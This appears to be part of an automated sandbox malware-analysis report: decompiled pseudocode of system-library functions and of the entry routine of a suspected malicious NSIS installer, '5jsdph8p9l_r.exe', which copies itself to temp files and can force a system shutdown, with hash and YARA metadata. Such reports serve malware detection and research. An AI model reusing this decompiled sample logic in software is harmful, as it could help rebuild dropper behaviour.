				 *((intOrPtr*)(_t151 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t151 - 0x160)) = 1;
				_t131 = 7;
				memset(_t151 - 0x15c, 0, _t131 << 2);
				_t144 =  *((intOrPtr*)(_t151 - 0xe8));
				_t91 = E00A02430(1, _t147, 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
				_t148 = _t91;
				if(_t91 >= 0) {
					if( *0xad8460 != 0 && ( *(_t151 - 0xe0) & 0x00000001) == 0) {
						_t95 = E00A02D50(7, 0, 2,  *((intOrPtr*)(_t151 - 0xfc)), _t151 - 0x140);
						_t148 = _t95;
						if(_t95 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
							if(( *(_t151 - 0x118) & 0x00000001) == 0) {
								if(( *(_t151 - 0x118) & 0x00000002) != 0) {
									 *(_t151 - 0x120) = 0xfffffffc;
								}
							} else {
								 *(_t151 - 0x120) =  *(_t151 - 0x120) & 0x00000000;
							}
							_t134 =  *((intOrPtr*)(_t151 - 0x114));
							_t96 =  *((intOrPtr*)(_t134 + 0x5c));
							 *((short*)(_t151 - 0xda)) = _t96;
							 *((short*)(_t151 - 0xdc)) = _t96;
							 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t134 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
							 *((intOrPtr*)(_t151 - 0xe8)) = _t151 - 0xd0;
							 *((short*)(_t151 - 0xea)) = 0xaa;
							_t104 = E009F4720(_t139,  *(_t151 - 0xf0) & 0x0000ffff, _t151 - 0xec, 2, 0);
							_t148 = _t104;
							if(_t104 < 0 || E009F9660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
								goto L1;
							} else {
								_t149 =  *0xad8460; // 0x74e0ff90
								 *0xadb1e0( *(_t151 - 0x120),  *(_t151 - 0xf0), _t151 - 0xe4);
								_t148 =  *_t149();
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									goto L1;
								}
								_t111 =  *((intOrPtr*)(_t151 - 0xe4));
								if(_t111 == 0xffffffff) {
									L25:
									 *((intOrPtr*)(_t151 - 4)) = 1;
									_t144 =  *0xad8468;
									if(_t144 != 0) {
										 *0xadb1e0(_t111);
										 *_t144();
									}
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									goto L1;
								}
								E009FF540(_t151 - 0x164, _t111);
								 *((intOrPtr*)(_t151 - 4)) = 0;
								if( *((intOrPtr*)(_t144 + 4)) != 0) {
									L00A02400(_t144);
								}
								_t145 =  *((intOrPtr*)(_t151 - 0xfc));
								_t148 = E00A02430(0,  *((intOrPtr*)(_t151 - 0xfc)), 0,  *((intOrPtr*)(_t151 - 0xf8)), _t144,  *((intOrPtr*)(_t151 - 0xf4)), _t151 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
								if(_t148 < 0) {
									L24:
									 *((intOrPtr*)(_t151 - 4)) = 0xfffffffe;
									_t111 = E00A5D704();
									goto L25;
								} else {
									_t148 = E00A02D50(7, 0, 2, _t145, _t151 - 0x140);
									 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
									if(_t148 < 0) {
										goto L24;
									}
									if( *((intOrPtr*)(_t151 - 0x13c)) == 1) {
										_t138 =  *((intOrPtr*)(_t151 - 0x114));
										_t119 =  *((intOrPtr*)(_t138 + 0x5c));
										 *((short*)(_t151 - 0xda)) = _t119;
										 *((short*)(_t151 - 0xdc)) = _t119;
										 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t138 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
										if(E009F9660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
											goto L24;
										}
										_t148 = 0xc0150004;
										L23:
										 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
										goto L24;
									}
									_t148 = 0xc0150005;
									goto L23;
								}
							}
						}
						_t148 = 0xc0150005;
					}
				}
				L1:
				return E00A3D130(1, _t144, _t148);
			}
















                                                                                            0x00a21cc7
                                                                                            0x00a21cc7
                                                                                            0x00a21ccc
                                                                                            0x00a21cd1
                                                                                            0x00a21cd6
                                                                                            0x00a21cdc
                                                                                            0x00a21cde
                                                                                            0x00a21ce7
                                                                                            0x00a21cf0
                                                                                            0x00a21cf9
                                                                                            0x00a21d01
                                                                                            0x00a21d09
                                                                                            0x00a21d0f
                                                                                            0x00a21d15
                                                                                            0x00a21d1b
                                                                                            0x00a21d2f
                                                                                            0x00a21d37
                                                                                            0x00a21d44
                                                                                            0x00a21d4c
                                                                                            0x00a21d55
                                                                                            0x00a21d68
                                                                                            0x00a21d78
                                                                                            0x00a21d7d
                                                                                            0x00a21d81
                                                                                            0x00a5d4e3
                                                                                            0x00a5d509
                                                                                            0x00a5d50e
                                                                                            0x00a5d512
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a5d51e
                                                                                            0x00a5d531
                                                                                            0x00a5d543
                                                                                            0x00a5d545
                                                                                            0x00a5d545
                                                                                            0x00a5d533
                                                                                            0x00a5d533
                                                                                            0x00a5d533
                                                                                            0x00a5d54f
                                                                                            0x00a5d555
                                                                                            0x00a5d559
                                                                                            0x00a5d560
                                                                                            0x00a5d570
                                                                                            0x00a5d57c
                                                                                            0x00a5d587
                                                                                            0x00a5d5a3
                                                                                            0x00a5d5a8
                                                                                            0x00a5d5ac
                                                                                            0x00000000
                                                                                            0x00a5d5ce
                                                                                            0x00a5d5e1
                                                                                            0x00a5d5e9
                                                                                            0x00a5d5f1
                                                                                            0x00a5d5f3
                                                                                            0x00a5d5fb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a5d601
                                                                                            0x00a5d60a
                                                                                            0x00a5d6e1
                                                                                            0x00a5d6e1
                                                                                            0x00a5d6e4
                                                                                            0x00a5d6ec
                                                                                            0x00a5d6f1
                                                                                            0x00a5d6f7
                                                                                            0x00a5d6f7
                                                                                            0x00a5d730
                                                                                            0x00000000
                                                                                            0x00a5d730
                                                                                            0x00a5d618
                                                                                            0x00a5d61f
                                                                                            0x00a5d625
                                                                                            0x00a5d628
                                                                                            0x00a5d628
                                                                                            0x00a5d644
                                                                                            0x00a5d651
                                                                                            0x00a5d653
                                                                                            0x00a5d65b
                                                                                            0x00a5d6d5
                                                                                            0x00a5d6d5
                                                                                            0x00a5d6dc
                                                                                            0x00000000
                                                                                            0x00a5d65d
                                                                                            0x00a5d670
                                                                                            0x00a5d672
                                                                                            0x00a5d67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a5d682
                                                                                            0x00a5d68b
                                                                                            0x00a5d691
                                                                                            0x00a5d695
                                                                                            0x00a5d69c
                                                                                            0x00a5d6ac
                                                                                            0x00a5d6c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a5d6ca
                                                                                            0x00a5d6cf
                                                                                            0x00a5d6cf
                                                                                            0x00000000
                                                                                            0x00a5d6cf
                                                                                            0x00a5d684
                                                                                            0x00000000
                                                                                            0x00a5d684
                                                                                            0x00a5d65b
                                                                                            0x00a5d5ac
                                                                                            0x00a5d520
                                                                                            0x00a5d520
                                                                                            0x00a5d4e3
                                                                                            0x00a21d87
                                                                                            0x00a21d8e

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            • Opcode ID: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
                                                                                            • Instruction ID: 186fcc552d92d4f2006eb955a8102846234c580f1cb3bc55275079a256477cb7
                                                                                            • Opcode Fuzzy Hash: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
                                                                                            • Instruction Fuzzy Hash: 08812671D00269DBDB31DF54DD45BEEB6B8AB09714F0141EAAA0DB7280E7309E85CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A734A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 89%
                                                                                            			E00A734A0(void* __ebx, intOrPtr __edi, signed int __esi, void* __eflags) {
				signed short* _t37;
				void* _t40;
				signed short _t56;
				signed int _t57;
				signed short* _t78;
				char* _t81;
				void* _t86;

				_t85 = __esi;
				_t84 = __edi;
				_push(0x68);
				_push(0xac0870);
				E00A3D0E8(__ebx, __edi, __esi);
				_t78 =  *(_t86 + 8);
				_t37 =  *(_t86 + 0xc);
				 *(_t86 - 0x50) = _t37;
				 *(_t86 - 0x4c) = _t37;
				if(( *0xad5cac & 0x00000004) == 0) {
					L17:
					L18:
					return E00A3D130(_t78, _t84, _t85);
				}
				_t40 = E00A12EB0(_t78[2]);
				if(_t40 == 0 || _t40 == 3 || _t40 == 5) {
					goto L17;
				} else {
					_t84 = 0;
					_t85 = E00A04120(0, _t78, 0, _t86 - 0x5c, 0, 0, 0);
					if(_t85 >= 0) {
						 *((intOrPtr*)(_t86 - 0x74)) = 0x18;
						 *((intOrPtr*)(_t86 - 0x70)) = 0;
						 *((intOrPtr*)(_t86 - 0x68)) = 0x40;
						 *((intOrPtr*)(_t86 - 0x6c)) = _t86 - 0x5c;
						 *((intOrPtr*)(_t86 - 0x64)) = 0;
						 *((intOrPtr*)(_t86 - 0x60)) = 0;
						_push(_t86 - 0x48);
						_push(_t86 - 0x74);
						_t85 = E00A298D0();
						L00A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t86 - 0x58)));
					}
					if( !_t85 < 0) {
						_t85 = E00A04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t84, ( *_t78 & 0x0000ffff) + 0xa);
						 *(_t86 - 0x54) = _t85;
						if(_t85 != 0) {
							_t23 = _t85 + 0xa; // 0xa
							E00A2F3E0(_t23, _t78[2],  *_t78 & 0x0000ffff);
							 *((short*)(_t85 + 8)) =  *_t78;
							E00A02280( *_t78, 0xad8610);
							 *((intOrPtr*)(_t86 - 4)) = _t84;
							_t56 = ( *0xad5764 & 0x0000ffff) + 2 + ( *_t78 & 0x0000ffff);
							 *(_t86 - 0x78) = _t56;
							if(_t56 <= 0xfffe) {
								 *0xad5764 = _t56;
								_t57 = "\\Wow\\Wow"; // 0x776f575c
								_t81 = "\\Wow\\Wow";
								if( *(_t57 + 4) != _t81) {
									_t81 = 3;
									asm("int 0x29");
								}
								 *_t85 = _t57;
								 *(_t85 + 4) = _t81;
								 *(_t57 + 4) = _t85;
								"\\Wow\\Wow" = _t85;
								 *((intOrPtr*)(_t86 - 4)) = 0xfffffffe;
								_t78 =  *(_t86 - 0x50);
								E00A02280(E00A73650(), 0xad8608);
								 *(_t86 - 0x4c) = E00A1F6B2(0xad6e40);
								E009FFFB0(_t78, _t84, 0xad8608);
								_t62 =  *(_t86 - 0x4c);
								if( *(_t86 - 0x4c) != 0) {
									L00A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t84, _t62);
								}
								 *_t78 = _t85;
							} else {
								E00A2D9D0(_t86, 0xadd360, _t86 - 0x10, 0xfffffffe);
							}
						}
					}
					goto L18;
				}
			}










                                                                                            0x00a734a0
                                                                                            0x00a734a0
                                                                                            0x00a734a0
                                                                                            0x00a734a2
                                                                                            0x00a734a7
                                                                                            0x00a734ac
                                                                                            0x00a734af
                                                                                            0x00a734b2
                                                                                            0x00a734b5
                                                                                            0x00a734bf
                                                                                            0x00a7365b
                                                                                            0x00a73660
                                                                                            0x00a73665
                                                                                            0x00a73665
                                                                                            0x00a734c8
                                                                                            0x00a734cf
                                                                                            0x00000000
                                                                                            0x00a734e7
                                                                                            0x00a734e7
                                                                                            0x00a734fa
                                                                                            0x00a734fe
                                                                                            0x00a73500
                                                                                            0x00a73507
                                                                                            0x00a7350a
                                                                                            0x00a73514
                                                                                            0x00a73517
                                                                                            0x00a7351a
                                                                                            0x00a73520
                                                                                            0x00a73524
                                                                                            0x00a7352a
                                                                                            0x00a73539
                                                                                            0x00a73539
                                                                                            0x00a73544
                                                                                            0x00a73563
                                                                                            0x00a73565
                                                                                            0x00a7356a
                                                                                            0x00a7357d
                                                                                            0x00a73581
                                                                                            0x00a7358c
                                                                                            0x00a73595
                                                                                            0x00a7359a
                                                                                            0x00a735aa
                                                                                            0x00a735ac
                                                                                            0x00a735b4
                                                                                            0x00a735d3
                                                                                            0x00a735d9
                                                                                            0x00a735de
                                                                                            0x00a735e6
                                                                                            0x00a735ea
                                                                                            0x00a735eb
                                                                                            0x00a735eb
                                                                                            0x00a735ed
                                                                                            0x00a735ef
                                                                                            0x00a735f2
                                                                                            0x00a735f5
                                                                                            0x00a735fb
                                                                                            0x00a73602
                                                                                            0x00a7360f
                                                                                            0x00a7361e
                                                                                            0x00a73626
                                                                                            0x00a7362b
                                                                                            0x00a73630
                                                                                            0x00a7363d
                                                                                            0x00a7363d
                                                                                            0x00a73642
                                                                                            0x00a735b6
                                                                                            0x00a735c1
                                                                                            0x00a735c9
                                                                                            0x00a735b4
                                                                                            0x00a7356a
                                                                                            0x00000000
                                                                                            0x00a73544

                                                                                            APIs
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00A735C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8
                                                                                            • String ID: @$\Wow\Wow
                                                                                            • API String ID: 4062629308-816453441
                                                                                            • Opcode ID: 9ae94ee687ff9f5bcbba30174e922a69f2a63dfd7452aec940410a5ae9b91c72
                                                                                            • Instruction ID: 7238978a4934d52655a6fe053e0218942e2a135ba541bebed16ee2ef60815da1
                                                                                            • Opcode Fuzzy Hash: 9ae94ee687ff9f5bcbba30174e922a69f2a63dfd7452aec940410a5ae9b91c72
                                                                                            • Instruction Fuzzy Hash: F6417B72D01218EECB20DFA9DE41A6EBBB8EF05B00F15852AF909DB361D630CA40DB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E00A7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x00a7fdda
                                                                                            0x00a7fde2
                                                                                            0x00a7fde5
                                                                                            0x00a7fdec
                                                                                            0x00a7fdfa
                                                                                            0x00a7fdff
                                                                                            0x00a7fe0a
                                                                                            0x00a7fe0f
                                                                                            0x00a7fe17
                                                                                            0x00a7fe1e
                                                                                            0x00a7fe19
                                                                                            0x00a7fe19
                                                                                            0x00a7fe19
                                                                                            0x00a7fe20
                                                                                            0x00a7fe21
                                                                                            0x00a7fe22
                                                                                            0x00a7fe25
                                                                                            0x00a7fe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDFA
                                                                                            Strings
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A7FE2B
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A7FE01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
                                                                                            • Instruction ID: b0b65e2aff501b94627cc11b22b82ebca0d5c5f5b16974e166a8aead0f794602
                                                                                            • Opcode Fuzzy Hash: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
                                                                                            • Instruction Fuzzy Hash: AEF0F632640601BFDA241B55DD02F23BB6AEB84730F24C315F628565E1DAA2FD2096F4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: 5jsdph8p9l_r.exe PID: 4024 Parent PID: 3352 5jsdph8p9l_r.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Program Files (x86)\\Gw4n";
										if(lstrcmpiA(_t116, "C:\\Program Files (x86)\\Gw4n") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x6dc460
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Program Files (x86)\\Gw4n\\5jsdph8p9l_r.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x6dc460
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("gqjlpjiaybpobgywdcz Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Program Files (x86)\\Gw4n\\5jsdph8p9l_r.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Program Files (x86)\\Gw4n\\5jsdph8p9l_r.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                                                            0x0040313b
                                                                                            0x0040313f
                                                                                            0x00403147
                                                                                            0x0040314b
                                                                                            0x00403150
                                                                                            0x00403160
                                                                                            0x00403163
                                                                                            0x0040316a
                                                                                            0x00403171
                                                                                            0x00403171
                                                                                            0x0040316a
                                                                                            0x00403173
                                                                                            0x00403173
                                                                                            0x00403289
                                                                                            0x00403289
                                                                                            0x00403289
                                                                                            0x0040328b
                                                                                            0x0040328d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403222
                                                                                            0x00403225
                                                                                            0x0040322d
                                                                                            0x0040322d
                                                                                            0x00403230
                                                                                            0x00403235
                                                                                            0x00403237
                                                                                            0x00403237
                                                                                            0x00403238
                                                                                            0x00403238
                                                                                            0x0040323d
                                                                                            0x00403240
                                                                                            0x00403279
                                                                                            0x0040327e
                                                                                            0x00403283
                                                                                            0x00403286
                                                                                            0x00403288
                                                                                            0x00403288
                                                                                            0x00403288
                                                                                            0x00000000
                                                                                            0x00403242
                                                                                            0x00403242
                                                                                            0x00403243
                                                                                            0x00403246
                                                                                            0x0040324e
                                                                                            0x00403251
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403251
                                                                                            0x00403258
                                                                                            0x0040325e
                                                                                            0x00403266
                                                                                            0x00403269
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x00403269
                                                                                            0x00403270
                                                                                            0x00403277
                                                                                            0x00403291
                                                                                            0x00403294
                                                                                            0x00403294
                                                                                            0x0040329d
                                                                                            0x004032a2
                                                                                            0x004032a2
                                                                                            0x004032ad
                                                                                            0x004032b3
                                                                                            0x004032b8
                                                                                            0x004032ba
                                                                                            0x004032e0
                                                                                            0x004032e5
                                                                                            0x004032ef
                                                                                            0x004032f6
                                                                                            0x004032fa
                                                                                            0x00403361
                                                                                            0x00403361
                                                                                            0x00403366
                                                                                            0x0040336c
                                                                                            0x00403370
                                                                                            0x00403485
                                                                                            0x0040348b
                                                                                            0x00403528
                                                                                            0x00403528
                                                                                            0x0040352d
                                                                                            0x00403530
                                                                                            0x00403532
                                                                                            0x00403532
                                                                                            0x0040353a
                                                                                            0x0040353a
                                                                                            0x0040349a
                                                                                            0x004034a3
                                                                                            0x004034a5
                                                                                            0x004034aa
                                                                                            0x004034ac
                                                                                            0x004034ae
                                                                                            0x004034b0
                                                                                            0x004034b2
                                                                                            0x004034b4
                                                                                            0x004034b6
                                                                                            0x004034c6
                                                                                            0x004034c8
                                                                                            0x004034ca
                                                                                            0x004034d7
                                                                                            0x004034e6
                                                                                            0x004034ee
                                                                                            0x004034f6
                                                                                            0x004034f6
                                                                                            0x004034ca
                                                                                            0x004034b6
                                                                                            0x004034b2
                                                                                            0x004034fa
                                                                                            0x004034ff
                                                                                            0x00403506
                                                                                            0x00403514
                                                                                            0x00403517
                                                                                            0x0040351d
                                                                                            0x0040351f
                                                                                            0x00000000
